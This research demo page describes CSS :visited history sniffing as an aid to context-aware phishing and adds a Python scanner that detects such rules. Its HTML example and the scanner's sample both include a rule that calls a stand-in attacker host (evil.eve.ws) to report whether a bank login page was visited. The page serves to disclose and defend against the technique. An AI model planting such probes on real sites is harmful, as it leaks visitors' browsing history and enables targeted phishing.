Phishing for Clues

Inferring Context Using Cascading Style Sheets and Browser History

Markus Jakobsson, Tom N. Jagatic, and Sid Stamm

Stop-Phishing.com

An illustrative example

Demonstration: View all "sites of interest" within your own browser history.

Send a browser-recon.info link to a friend (demonstration form)
Note: Only your name will be shared with the recipient of the message. Notification messages about your friend's browser history will only indicate whether this technique was successful.

The strongest indication consumers get that a particular phishing email is not legitimate is that it is "sent by" an institution they have no relationship with. For example, a person who banks with CitiBank and AmeriTrade is not going to believe an email appearing to be sent by Chase or etrade, asking him or her to confirm a password. To improve the yield, phishers are likely to try to automatically extract as much information as they can about their victims, then target them in ways that are consistent with that context. More concretely, if a phisher could determine a victim's banking relationships, he would not have to spoof the "wrong" entities when targeting that victim. Alarmingly, this is rather straightforward to do, and hard to protect against.

There is a simple technique that uses Cascading Style Sheets to examine the web browser history of an unsuspecting web site visitor. It is particularly worrisome in the problem domain of phishing. Phishers typically send massive amounts of bulk email hoping their lure will be successful. Given greater context, such lures can be tailored far more effectively, perhaps even into a context-aware phishing attack. It should be emphasized that the following attack can be launched from any arbitrary web site, since it consists of nothing more than HTML markup and a style sheet. Many web browsers are susceptible.

Cascading Style Sheets (CSS) is a stylesheet language used to describe the presentation of a document written in a markup language such as HTML. The CSS :visited pseudo-class can be used in the following manner to notify a phisher, Eve, whether Alice has visited the web page http://some.bank.com/login. The #foo:visited rule in this example sets the background property to reference Eve's tracking application at http://evil.eve.ws/tracker; the browser requests that URL, and thereby reports to Eve, only if http://some.bank.com/login appears in the history of Alice's web browser.

    <html>
    <head>
    <!-- [...] -->
    <style type="text/css">
      /* This rule applies only if the link's URL is in the browser history,
         and the background image is fetched only when the rule applies */
      #foo:visited {
         background: url(http://evil.eve.ws/tracker?who=alice&what=somebank);
      }
    </style>
    </head>
    <body>
    <!-- The probed link; it needs no visible text to be styled -->
    <a id="foo" href="http://some.bank.com/login"></a>
    </body>
    </html>
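As an added defensive example, not code from the authors or from Stop-Phishing.com: a small Python scanner that statically flags the pattern above in an HTML document, namely any :visited rule whose declarations load a URL, and reports which link is being probed and where the beacon request would go. The embedded sample reuses the hostnames from the page's illustration; the regular expressions are deliberately simple and assume CSS without nested @-rules.

```python
"""Static scanner for history-sniffing CSS (added example, not the authors' code).
Flags :visited rules that fetch a resource and maps them back to the probed link."""
import re
from urllib.parse import urlparse

STYLE_RE = re.compile(r"<style\b[^>]*>(.*?)</style>", re.I | re.S)
RULE_RE = re.compile(r"([^{}]+)\{([^{}]*)\}", re.S)          # selector { declarations }
URL_RE = re.compile(r"url\(\s*['\"]?([^'\")\s]+)", re.I)     # url(...) in a declaration
A_TAG_RE = re.compile(r"<a\b([^>]*)>", re.I)
ATTR_RE = re.compile(r"\b(id|href)\s*=\s*(?:\"([^\"]*)\"|'([^']*)'|([^\s>]+))", re.I)
ID_SEL_RE = re.compile(r"#([\w-]+)")
HREF_SEL_RE = re.compile(r"href\s*=\s*['\"]([^'\"]+)['\"]", re.I)

# Constructed sample, mirroring the page's example (hosts taken from it).
SAMPLE = """<head><style type="text/css">
  #foo:visited{ background: url(http://evil.eve.ws/tracker?who=alice&what=somebank); }
  a:visited { color: purple; }
</style></head>
<a id="foo" href="http://some.bank.com/login"></a>"""

def _anchors_by_id(html):
    """Map id -> href for every <a> tag, whatever the attribute order."""
    found = {}
    for attrs in A_TAG_RE.findall(html):
        pairs = {m.group(1).lower(): (m.group(2) or m.group(3) or m.group(4) or "")
                 for m in ATTR_RE.finditer(attrs)}
        if "id" in pairs:
            found[pairs["id"]] = pairs.get("href", "")
    return found

def find_history_probes(html):
    """One record per :visited rule that loads a URL: the selector, the beacon URL
    and host, and the link whose history entry decides whether the fetch happens."""
    anchors = _anchors_by_id(html)
    probes = []
    for css in STYLE_RE.findall(html):
        for selector, body in RULE_RE.findall(css):
            selector = selector.strip()
            if ":visited" not in selector.lower():
                continue
            beacons = URL_RE.findall(body)
            if not beacons:
                continue  # colour-only :visited styling is ordinary CSS, not a probe
            m = HREF_SEL_RE.search(selector)          # a[href="..."]:visited form
            ids = ID_SEL_RE.findall(selector)         # #id:visited form, as on this page
            probed = m.group(1) if m else (anchors.get(ids[0], "") if ids else "")
            for beacon in beacons:
                probes.append({"selector": selector, "beacon": beacon,
                               "beacon_host": urlparse(beacon).hostname or "",
                               "probes": probed})
    return probes

if __name__ == "__main__":
    for p in find_history_probes(SAMPLE):
        print(f"{p['selector']} probes {p['probes']} and reports to {p['beacon_host']}")
```

Current browsers restrict :visited styling to colour changes and do not fetch resources for it, so a hit from this scanner identifies an attempt rather than a probe that will work against an up-to-date client.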

A similar technique can be performed by measuring the time required for certain web browser operations, namely cache hits and misses for targeted content. Felten and Schneider describe this approach in Timing Attacks on Web Privacy.

To learn more about possible countermeasures, please read our paper (pdf) or send us an email.